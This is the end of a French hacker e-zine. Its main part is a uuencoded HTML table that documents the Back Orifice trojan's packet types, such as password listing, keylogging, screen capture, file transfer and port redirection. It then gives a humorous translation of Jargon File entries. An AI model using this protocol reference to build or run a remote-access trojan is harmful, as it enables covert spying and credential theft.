M:7,@;&4@<&5R:7!H97)I<75E(&1E(&-A<'1U<F4@=FED96\N/"]41#X\+U12
M/@T*("`\5%(^#0H@("`@/%1$/E194$5?34U#05!!5DD\+U1$/@T*("`@(#Q4
M1#XP>#(Y/"]41#X-"B`@("`\5$0^0V%P='5R97(@=6X@9FQU>"!V:61E;R`H
M+F%V:2D@9&5P=6ES(&QE('!E<FEP:&5R:7%U92!D92!C87!T=7)E('9I9&5O
M+CPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7TU-4$Q!65-/54Y$
M/"]41#X-"B`@("`\5$0^,'@R83PO5$0^#0H@("`@/%1$/DIO=65R('5N(&9I
M8VAI97(@<V]N("@N5T%6*3PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y4
M65!%7TU-3$E35$-!4%,\+U1$/@T*("`@(#Q41#XP>#)B/"]41#X-"B`@("`\
M5$0^36]N=')E<B!L97,@<&5R:7!H97)I<75E(&1E(&-A<'1U<F4@:6UA9V4O
M=FED96\\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]-34-!4%-#
M4D5%3CPO5$0^#0H@("`@/%1$/C!X,F,\+U1$/@T*("`@(#Q41#Y#87!T=7)E
M(&0G96-R86X@<W1O8VME92!S=7(@=6X@9FEC:&EE<B`H+D)-4"D\+U1$/CPO
M5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]40U!&24Q%4T5.1#PO5$0^#0H@
M("`@/%1$/C!X,F0\+U1$/@T*("`@(#Q41#Y#;VUM96YC97(@;"=E;G9O:2!D
M)W5N(&9I8VAI97(@96X@=71I;&ES86YT(%1#4#PO5$0^/"]44CX-"B`@/%12
M/@T*("`@(#Q41#Y465!%7U1#4$9)3$5214-%259%/"]41#X-"B`@("`\5$0^
M,'@R93PO5$0^#0H@("`@/%1$/D-O;6UE;F-E<B!L82!R96-E<'1I;VX@9"=U
M;B!F:6-H:65R(&5N('5T:6QI<V%N="!40U`\+U1$/CPO5%(^#0H@(#Q44CX-
M"B`@("`\5$0^5%E015]03%5'24Y,25-4/"]41#X-"B`@("`\5$0^,'@R9CPO
M5$0^#0H@("`@/%1$/DQI<W1E<B!L97,@<&QU9RUI;G,@*&5N(&-O=7)S(&0G
M97AE8W5T:6]N*2`\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]0
M3%5'24Y+24Q,/"]41#X-"B`@("`\5$0^,'@S,#PO5$0^#0H@("`@/%1$/DMI
M;&P@<&QU9RUI;CPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7T1)
M4D5#5$]264Q)4U0\+U1$/@T*("`@(#Q41#XP>#,Q/"]41#X-"B`@("`\5$0^
M3&ES=&5R(&QE(&1I<F5C=&]R>3PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q4
M1#Y465!%7T9)3$5&24Y$/"]41#X-"B`@("`\5$0^,'@S-#PO5$0^#0H@("`@
M/%1$/E1R;W5V97(@=6X@9FEC:&EE<CPO5$0^/"]44CX-"B`@/%12/@T*("`@
M(#Q41#Y465!%7T9)3$5$14Q%5$4\+U1$/@T*("`@(#Q41#XP>#,U/"]41#X-
M"B`@("`\5$0^169F86-E<B!U;B!F:6-H:65R/"]41#X\+U12/@T*("`\5%(^
M#0H@("`@/%1$/E194$5?1DE,159)15<\+U1$/@T*("`@(#Q41#XP>#,V/"]4
M1#X-"B`@("`\5$0^5F]I<B!L92!C;VYT96YU(&1U(&9I8VAI97(\+U1$/CPO
M5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]&24Q%4D5.04U%/"]41#X-"B`@
M("`\5$0^,'@S-SPO5$0^#0H@("`@/%1$/E)E;F]M;65R('5N(&9I8VAI97(\
M+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]&24Q%0T]063PO5$0^
M#0H@("`@/%1$/C!X,S@\+U1$/@T*("`@(#Q41#Y#;W!I97(@=6X@9FEC:&EE
M<CPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7TY%5%9)15<\+U1$
M/@T*("`@(#Q41#XP>#,Y/"]41#X-"B`@("`\5$0^3&ES="!T;W5S(&QE<R!P
M97)I<&AE<FEQ=65S(')E<V5A=2P@;F]M<R!D92!D;VUA:6YE<R!E="!P87)T
M86=E<SPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7TY%5%5313PO
M5$0^#0H@("`@/%1$/C!X,V$\+U1$/@T*("`@(#Q41#Y392!C;VYN96-T97(@
M82!U;F4@<F5S<V]U<F-E(')E<V5A=3PO5$0^/"]44CX-"B`@/%12/@T*("`@
M(#Q41#Y465!%7TY%5$1%3$5413PO5$0^#0H@("`@/%1$/C!X,V(\+U1$/@T*
M("`@(#Q41#YS92!D96-O;FYE8W1E<B!D)W5N92!R97-S;W5R8V4@<F5S96%U
M/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?3D540T].3D5#5$E/
M3E,\+U1$/@T*("`@(#Q41#XP>#-C/"]41#X-"B`@("`\5$0^36]N=')E<B!L
M97,@8V]N;F5X:6]N<R!R97-E874\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]$25)%0U1/4EE-04M%/"]41#X-"B`@("`\5$0^,'@S9#PO5$0^
M#0H@("`@/%1$/D-R965R('5N(')E<&5R=&]I<F4@*&9O;&1E<BD\+U1$/CPO
M5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]$25)%0U1/4EE$14Q%5$4\+U1$
M/@T*("`@(#Q41#XP>#-E/"]41#X-"B`@("`\5$0^169F86-E<B!U;B!R97!E
M<G1O:7)E/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?05!03$E3
M5#PO5$0^#0H@("`@/%1$/C!X,V8\+U1$/@T*("`@(#Q41#Y-;VYT<F5R(&QE
M<R!A<'!L:6-A=&EO;G,@96X@8V]U<G,\+U1$/CPO5%(^#0H\+U1"3T19/@T*
M/"]404),13X-"CQ(,SY,97,@9&5U>"!P;'5S(&EM<&]R=&%N="!B:71S(&1E
M(&PG;V-T970@='EP92!D)W5N('!A<75E=#PO2#,^#0H\5$%"3$4@8F]R9&5R
M/3$@=VED=&@](C$P,"4B/@T*("`\5$)/1%D^#0H@(#Q44CX-"B`@("`\5$@^
M36YE;6]N:7%U93PO5$@^#0H@("`@/%1(/DUA<W%U93PO5$@^#0H@("`@/%1(
M/E-I9VEF:6-A=&EO;CPO5$@^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y005)4
M24%,7U!!0TM%5#PO5$0^#0H@("`@/%1$/C!X.#`\+U1$/@T*("`@(#Q41#Y#
M96-I(&5S="!U;B!F<F%G;65N="!D92!P87%U970@+"!I+F4N(&EL(&9A=70@
M<R=A='1E;F1R92!A(&5N('9O:7(@9"=A=71R97,@/"]41#X-"B`@/%12/@T*
M("`@(#Q41#Y#3TY424Y5141?4$%#2T54/"]41#X-"B`@("`\5$0^,'@T,#PO
M5$0^#0H@("`@/%1$/D-E8VD@97-T('5N(&9R86=M96YT(&1E('!A<75E="!F
M<F%G;65N=.D\+U1$/CPO5%(^/"]40D]$63X\+U1!0DQ%/@T*/$),3T-+455/
M5$4^#0H\23Y#97,@9&5U>"!F;&%G<R!S;VYT(&5N(&=E;F5R86P@8V]M8FEN
M97,@82!L)VEN=&5R:65U<B!D)W5N('!A<75E="X@4&%R(&5X96UP;&4L('5N
M(&=R;W,@<&%Q=65T(&9R86=M96YT92!E;B`T('!L=7,@<&5T:71S('-E<F%I
M="!E;G9O>64@879E8R!L92!F;&%G('-U:79A;G0Z/"])/B`-"CQ"3$]#2U%5
M3U1%/@T*/%!213X-"C$N(%!!4E1)04Q?4$%#2T54#0HR+B!005)424%,7U!!
M0TM%5"!\($-/3E1)3E5%1%]004-+150-"C,N(%!!4E1)04Q?4$%#2T54('P@
M0T].5$E.545$7U!!0TM%5`T*-"X@0T].5$E.545$7U!!0TM%5`T*/"]04D4^
M#0H\+T),3T-+455/5$4^/"]"3$]#2U%53U1%/@T*/$@R/D1O;FYE97,\+T@R
M/@T*3&$@>F]N92!D92!D;VYN97,@9"=U;B!P87%U970@9&4@0D\@87)R:79E
M(&IU<W1E(&%P<F5S(&QE(&AE861E<BX@16QL92!E<W0@8V]M<&]S964@9"=U
M;F4@<VEM<&QE('-E<75E;F-E(&1E(&-A<F%T97)E<RP@=&5R;6EN964@<&%R
M(&QE(&-A<F%C=&5R92!!4T-)22!C;V1E(#`@*'IE<F\I("TM($Y53"X@3&4@
M8V%R86-T97)E(&1E('1E<FUI;F%I<V]N(&5S="!O8FQI9V%T;VER92X@0V4@
M<75I('-I9VYI9FEE('%U92!L82!Z;VYE(&1E(&1O;FYE97,@82!U;F4@;&]N
M9W5E=7(@;6EN:6UU;2!D92`Q(&]C=&5T("@_/S\I+@T*/%`^3&4@8V]N=&5N
M=2!D92!L82!Z;VYE(&1E(&1O;FYE97,@9&]I="!E=')E(&EN=&5R<')E=&4@
M9&EF9F5R96UE;G0@<VD@;&4@<&%Q=65T('9A(&1U('-E<G9E=7(@874@8VQI
M96YT+"!O=2!I;G9E<G-E;65N="`H/S\_*2X-"CQ(,SY:;VYE(&1E(&1O;FYE
M97,\+T@S/@T*/%1!0DQ%(&)O<F1E<CTQ('=I9'1H/2(Q,#`E(CX-"B`@/%1"
M3T19/@T*("`\5%(^#0H@("`@/%1(/E1Y<&4@9&4@<&%Q=65T/"]42#X-"B`@
M("`\5$@^0VAA;7`@,3PO5$@^#0H@("`@/%1(/D-H86UP(#(\+U1(/CPO5%(^
M#0H@(#Q44CX-"B`@("`\5$0^5%E015]%4E)/4CPO5$0^#0H@("`@/%1$/B@_
M/S\I/"]41#X-"B`@("`\5$0^*#\_/RD\+U1$/CPO5%(^#0H@(#Q44CX-"B`@
M("`\5$0^5%E015]024Y'/"]41#X-"B`@("`\5$0^3B]!/"]41#X-"B`@("`\
M5$0^3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4UE34D5"
M3T]4/"]41#X-"B`@("`\5$0^3B]!/"]41#X-"B`@("`\5$0^3B]!/"]41#X\
M+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4UE33$]#2U50/"]41#X-"B`@
M("`\5$0^3B]!/"]41#X-"B`@("`\5$0^3B]!/"]41#X\+U12/@T*("`\5%(^
M#0H@("`@/%1$/E194$5?4UE33$E35%!!4U-73U)$4SPO5$0^#0H@("`@/%1$
M/DXO03PO5$0^#0H@("`@/%1$/DXO03PO5$0^/"]44CX-"B`@/%12/@T*("`@
M(#Q41#Y465!%7U-94U9)15=#3TY33TQ%/"]41#X-"B`@("`\5$0^*#\_/RD\
M+U1$/@T*("`@(#Q41#XH/S\_*3PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q4
M1#Y465!%7U-94TE.1D\\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/@T*("`@(#Q4
M1#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]365-,3T=+
M15E3/"]41#X-"B`@("`\5$0^3F]M(&1E(&9I8VAI97(\+U1$/@T*("`@(#Q4
M1#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]365-%3D1+
M15E,3T<\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/@T*("`@(#Q41#Y.+T$\+U1$
M/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]365-$24%,3T="3U@\+U1$
M/@T*("`@(#Q41#Y497AT93PO5$0^#0H@("`@/%1$/E1I=')E/"]41#X\+U12
M/@T*("`\5%(^#0H@("`@/%1$/E194$5?4D5'25-44EE$14Q%5$5604Q513PO
M5$0^#0H@("`@/%1$/DYO;2!D92!V86QE=7(\+U1$/@T*("`@(#Q41#Y.+T$\
M+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]2141)4D%$1#PO5$0^
M#0H@("`@/%1$/E!O<G0@82!O=79R:7(\+U1$/@T*("`@(#Q41#Y!9&1R97-S
M.G!O<G0\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]2141)4D1%
M3#PO5$0^#0H@("`@/%1$/DED96YT:69I8V%T:6]N/"]41#X-"B`@("`\5$0^
M3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4D5$25),25-4
M/"]41#X-"B`@("`\5$0^3B]!/"]41#X-"B`@("`\5$0^3B]!/"]41#X\+U12
M/@T*("`\5%(^#0H@("`@/%1$/E194$5?05!0041$/"]41#X-"B`@("`\5$0^
M3F]M(&1E(&9I8VAI97(@97AE8W5T86)L93PO5$0^#0H@("`@/%1$/E!O<G1A
M(%1#4#PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7T%04$1%3#PO
M5$0^#0H@("`@/%1$/DED96YT:69I8V%T:6]N/"]41#X-"B`@("`\5$0^3B]!
M/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?3D5415A03U)4041$
M/"]41#X-"B`@("`\5$0^4&%R=&%G93PO5$0^#0H@("`@/%1$/D1I<F5C=&]R
M>2P@;6]T(&1E('!A<W-E+"!N;W1E/"]41#X\+U12/@T*("`\5%(^#0H@("`@
M/%1$/E194$5?3D5415A03U)41$5,151%/"]41#X-"B`@("`\5$0^4&%R=&%G
M93PO5$0^#0H@("`@/%1$/DXO03PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q4
M1#Y465!%7TY%5$584$]25$Q)4U0\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/@T*
M("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]0
M04-+151215-%3D0\+U1$/@T*("`@(#Q41#XH/S\_*3PO5$0^#0H@("`@/%1$
M/B@_/S\I/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?2%144$5.
M04),13PO5$0^#0H@("`@/%1$/E!O<G0\+U1$/@T*("`@(#Q41#Y297!E<G1O
M:7)E(')A8VEN92!D=2!S97)V975R/"]41#X\+U12/@T*("`\5%(^#0H@("`@
M/%1$/E194$5?2%144$1)4T%"3$4\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/@T*
M("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]2
M15-/3%9%2$]35#PO5$0^#0H@("`@/%1$/DAO<W0@;F%M93PO5$0^#0H@("`@
M/%1$/DXO03PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7T9)3$5&
M4D5%6D4\+U1$/@T*("`@(#Q41#Y&:6-H:65R(&5N(&5N=')E93PO5$0^#0H@
M("`@/%1$/D9I8VAI97(@96X@<V]R=&EE/"]41#X\+U12/@T*("`\5%(^#0H@
M("`@/%1$/E194$5?1DE,14U%3%0\+U1$/@T*("`@(#Q41#Y&:6-H:65R(&5N
M(&5N=')E93PO5$0^#0H@("`@/%1$/D9I8VAI97(@96X@<V]R=&EE/"]41#X\
M+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4$Q51TE.15A%0U5413PO5$0^
M#0H@("`@/%1$/D1,3#I&;VYC=&EO;CPO5$0^#0H@("`@/%1$/E!A<F%M971R
M97,\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]04D]#15-33$E3
M5#PO5$0^#0H@("`@/%1$/DXO03PO5$0^#0H@("`@/%1$/DXO03PO5$0^/"]4
M4CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U!23T-%4U-+24Q,/"]41#X-"B`@
M("`\5$0^261E;G1I9FEC871I;VX\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/CPO
M5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]04D]#15-34U!!5TX\+U1$/@T*
M("`@(#Q41#Y.;VT@9&4@9FEC:&EE<B!E>&5C=71A8FQE(&5T(&%R9W5M96YT
M<SPO5$0^#0H@("`@/%1$/E9I<VEB;&4\02`-"B`@("`@(&AR968](B-465!%
M7U!23T-%4U-34$%73E].3U1%(CX\4U50/C$\+U-54#X\+T$^/"]41#X\+U12
M/@T*("`\5%(^#0H@("`@/%1$/E194$5?4D5'25-44EE#4D5!5$5+15D\+U1$
M/@T*("`@(#Q41#Y+97D\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@
M(#Q44CX-"B`@("`\5$0^5%E015]214=)4U1265-%5%9!3%5%/"]41#X-"B`@
M("`\5$0^3F]M(&1E('9A;&5U<CPO5$0^#0H@("`@/%1$/E1Y<&4L=F%L975R
M/$$@#0H@("`@("!H<F5F/2(C5%E015]214=)4U1265-%5%9!3%5%7TY/5$4B
M/CQ355`^,CPO4U50/CPO03X\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^
M5%E015]214=)4U12641%3$5414M%63PO5$0^#0H@("`@/%1$/D-LZ3PO5$0^
M#0H@("`@/%1$/DXO03PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%
M7U)%1TE35%)914Y534M%65,\+U1$/@T*("`@(#Q41#Y#3.D\+U1$/@T*("`@
M(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]214=)
M4U12645.54U604Q3/"]41#X-"B`@("`\5$0^0TSI/"]41#X-"B`@("`\5$0^
M3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?34U#05!&4D%-
M13PO5$0^#0H@("`@/%1$/D9I8VAI97(@+D)-4#PO5$0^#0H@("`@/%1$/E!E
M<FEP:&5R:7%U92QL87)G975R+&AA=71E=7(L8FET<SPO5$0^/"]44CX-"B`@
M/%12/@T*("`@(#Q41#Y465!%7TU-0T%0059)/"]41#X-"B`@("`\5$0^07)C
M:&EV92`N059)/"]41#X-"B`@("`\5$0^4&5R:7!H97)I<75E+'-E8V]N9&5S
M+&QA<F=E=7(L:&%U=&5U<BQB:71S/"]41#X\+U12/@T*("`\5%(^#0H@("`@
M/%1$/E194$5?34U03$%94T]53D0\+U1$/@T*("`@(#Q41#Y&:6-H:65R("Y7
M058\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]-34Q)4U1#05!3/"]41#X-"B`@("`\5$0^3B]!/"]41#X-"B`@
M("`\5$0^3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?34U#
M05!30U)%14X\+U1$/@T*("`@(#Q41#Y&:6-H:65R("Y"35`\+U1$/@T*("`@
M(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]40U!&
M24Q%4T5.1#PO5$0^#0H@("`@/%1$/DYO;2!D92!F:6-H:65R/"]41#X-"B`@
M("`\5$0^061R97-S93IP;W)T/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$
M/E194$5?5$-01DE,15)%0T5)5D4\+U1$/@T*("`@(#Q41#Y.;VT@9&4@9FEC
M:&EE<CPO5$0^#0H@("`@/%1$/D%D<F5S<V4Z<&]R=#PO5$0^/"]44CX-"B`@
M/%12/@T*("`@(#Q41#Y465!%7U!,54=)3DQ)4U0\+U1$/@T*("`@(#Q41#Y.
M+T$\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]03%5'24Y+24Q,/"]41#X-"B`@("`\5$0^261E;G1I9FEC871I
M;VX\+U1$/@T*("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]$25)%0U1/4EE,25-4/"]41#X-"B`@("`\5$0^1&ER96-T;W)Y
M/"]41#X-"B`@("`\5$0^3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$
M/E194$5?1DE,149)3D0\+U1$/@T*("`@(#Q41#Y.;VT@*&5T+V]U('=I;&1C
M87)D<RD\+U1$/@T*("`@(#Q41#Y286EZ/"]41#X\+U12/@T*("`\5%(^#0H@
M("`@/%1$/E194$5?1DE,141%3$5413PO5$0^#0H@("`@/%1$/DYO;2!D92!F
M:6-H:65R/"]41#X-"B`@("`\5$0^3B]!/"]41#X\+U12/@T*("`\5%(^#0H@
M("`@/%1$/E194$5?1DE,159)15<\+U1$/@T*("`@(#Q41#Y.;VT@9&4@9FEC
M:&EE<CPO5$0^#0H@("`@/%1$/DXO03PO5$0^/"]44CX-"B`@/%12/@T*("`@
M(#Q41#Y465!%7T9)3$5214Y!344\+U1$/@T*("`@(#Q41#Y!;F-I96X@9FEC
M:&EE<B`H/S\_*3PO5$0^#0H@("`@/%1$/DYO=79E874@9FEC:&EE<B`H/S\_
M*3PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7T9)3$5#3U!9/"]4
M1#X-"B`@("`\5$0^4V]U<F-E(&9I;&4\+U1$/@T*("`@(#Q41#Y$97-T:6YA
M=&EO;B!F:6QE/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?3D54
M5DE%5SPO5$0^#0H@("`@/%1$/DXO03PO5$0^#0H@("`@/%1$/DXO03PO5$0^
M/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7TY%5%5313PO5$0^#0H@("`@
M/%1$/E)E<W-O=7)C92!R97-E874\+U1$/@T*("`@(#Q41#Y-;W0@9&4@<&%S
M<V4\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015].151$14Q%5$4\
M+U1$/@T*("`@(#Q41#Y297-S;W5R8V4\+U1$/@T*("`@(#Q41#Y.+T$\+U1$
M/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015].151#3TY.14-424].4SPO
M5$0^#0H@("`@/%1$/DXO03PO5$0^#0H@("`@/%1$/DXO03PO5$0^/"]44CX-
M"B`@/%12/@T*("`@(#Q41#Y465!%7T1)4D5#5$]264U!2T4\+U1$/@T*("`@
M(#Q41#Y.;W5V96%U(&YO;2!D=2!R97!E<G1O:7)E/"]41#X-"B`@("`\5$0^
M3B]!/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?1$E214-43U)9
M1$5,151%/"]41#X-"B`@("`\5$0^3F]M(&1U(')E<&5R=&]I<F4\+U1$/@T*
M("`@(#Q41#Y.+T$\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]!
M4%!,25-4/"]41#X-"B`@("`\5$0^3B]!/"]41#X-"B`@("`\5$0^3B]!/"]4
M1#X\+U12/CPO5$)/1%D^/"]404),13X-"CQ"3$]#2U%53U1%/CQ!(&YA;64]
M5%E015]04D]#15-34U!!5TY?3D]413X\4U50/C$\+U-54#X\+T$^(%-I(&QE
M('-E8V]N9"!P87)A;65T<F4@97-T('!R97-E;G0L(&PG87!P;&EC871I;VX@
M97-T('9I<VEB;&4N($%U=')E;65N="P@96QL92!E<W0@8V%C:&5E+@T*("`\
M4#X\02!N86UE/5194$5?4D5'25-44EE3151604Q515].3U1%/CQ355`^,CPO
M4U50/CPO03X@3&4@='EP92!P975T(&5T<F4@(D(B('!O=7(-"B`@8FEN86ER
M92P@(D0B('!O=7(@=6X@9&]U8FQE(&UO="`H1%=/4D0I(&5T(")3(B!P;W5R
M('5N92!C:&%I;F4@9&4@8V%R86-T97)E<RX-"B`@1&%N<R!C:&%M<',@8FEN
M86ER97,L(&QA('9A;&5U<B!E<W0@=6YE('-E<75E;F-E(&1E(&1E=7@@;F]M
M8G)E<R!H97AA9&5C:6UA=7@@*&4N9RX@#0H@("(\0T]$13YA8B`Q,2`U9CPO
M0T]$13XB*3L@9&%N<R!D97,@8VAA;7!S($173U)$+"!L82!V86QE=7(@9&]I
M="!E=')E('-P96-I9FEE92!E;@T*("!D96-I;6%L.R!D86YS(&1E<R!C:&%M
M<',@9&4@8VAA:6YE<RP@;&$@=F%L975R(&5S="!L82!C:&%I;F4N(#PO4#X\
E+T),3T-+455/5$4^#0H\:#,^02!354E64D4N+BXN+BX\+V@S/@``
`
end


La suite au prochain numero ...

          _        ___________________________________        _
           `^°*;:,.> Jargon file (traduction YopYop) <.,:;*°^`
__________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_____________________

	Kailas est un monde dont l'acces n'est trouvable qu'après avoir
atteint l'état ",4" et la recherche est la clef de la porte. Alors en gros si 
la savate est en toi tu es sur le bon chemin.

Extrait et traduction du Jargon file :


GEEK [geek] Un guique est quelqu'un qui passe du temps a 
"socialiser" sur un ordinateur. Ca peut signifier 
dialoguer sur IRC ou ICQ, jouer en réseau, poster des 
messages sur alt.sex.bondage.particle.physics, ou meme 
créer des sharewares. Quelqu'un qui utilise son ordinateur 
pour travailler, mais ne passe pas son temps libre en ligne 
n'est pas un guique. (...) Les guiques sont en général des
marginaux par rapport à la société américaine. Les rangs 
de la guiquitude sont plein de joueurs, de ravers, de fans 
de science-fiction, de punks, de pervers, de programmateurs, 
de "neurdes" (forts en theme tetes a claques), de 
sous-génies et de trekkies (fans de Star-Trek). Ce sont les 
gens qui ne participaient pas aux soirées au lycée et qui 
auraient été vexés qu'on suggere qu'ils auraient voulu y 
aller. Les guiques préferent socialiser avec d'autres 
quiques (...) Les guiques sont leur propre société: un 
underground hyperinformé et érudit. 
Un neurde est une personne sans compétences sociales, 
habituellement obsédée par la science ou la technologie 
("guique" est lié aux ordinateurs) (...) Beaucoup de 
neurdes sont aussi des guiques et utilisent le net comme 
un écran protecteur derrière lequel se cacher pour exercer 
leurs compétences sociales. (...) 
Le terme "hackeur" a tendance a désigner les éléments du 
peuple guique qui programment le plus. Cependant, le terme 
est trop utilisé dans les médias et par conséquent n'est 
plus trop employé parmi les "vrais guiques". Hackeur a 
aussi des connotations négatives relatives au piratage 
(cracking). 

CON [tiré de "con" SF fandom] n. Congres de 
science-fiction (abrevation de "convention"). N'est pas 
utilise pour d'autres sortes de congres, tel que des 
congres professionels. Ce terme, contrairement a d'autres 
provenant du jargon des fans de science fiction, est 
largement reconnu meme par les Hackers n'etant pas fans. 
"Nous avons correspondu sur le net durant des mois, puis 
nous avons fait connaissance a une (conf)". 

OPTIMISM n. 
Ce dont un programmeur est plein apres avoir fixe le 
dernier bug et juste avant de decouvrir le prochain 
*dernier* bug. Le livre "The Mythical Man-Month" de Fred 
Brooks, contient le paragraphe suivant qui decrit cela 
parfaitement bien: Tout les programmeurs sont optimistes. 
C'est probablement cette magie moderne qui attire ceux 
qui croient aux "happy endings". Peut-etre que les 
centaines d'infimes frustration les detournent tous sauf 
ceux qui ont l'habitude de se concentrer sur le but final. 
Ou peut-etre encore que les ordinateurs sont jeunes, que 
les programmeurs le sont plus encore, et que les jeunes 
sont toujours optimistes. Mais toutefois le procede de 
selection fonctionne, le resultat est indiscutable: "Cette 
fois-ci ca marchera", ou encore "Je viens juste de trouver 
le dernier bug".

Vous retrouverez sur le prochain numero la suite
des aventures de YopYop au pays du jargon file.

YopYop

¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø

______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                               -<\________________________/>-
   ~~    ~~    ~~    ~~    ~~°ºØø¦    ¿<H A C K 0 F F>?   ¦øØº°~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~-</¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\>-~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~ http://come.to/legang  ~~   ~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~   ~~    ~~    ~~     ~~    
   ~~    ~~    ~~    ~~    ~~  http://members.tripod.com/cakeii ~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~~    ~                       ~~    ~~    ~~    ~~    ~~    ~~
.........Des commentaires, des questions, des insultes, ecrivez aux membres du gang.........
______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
        		    ,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,
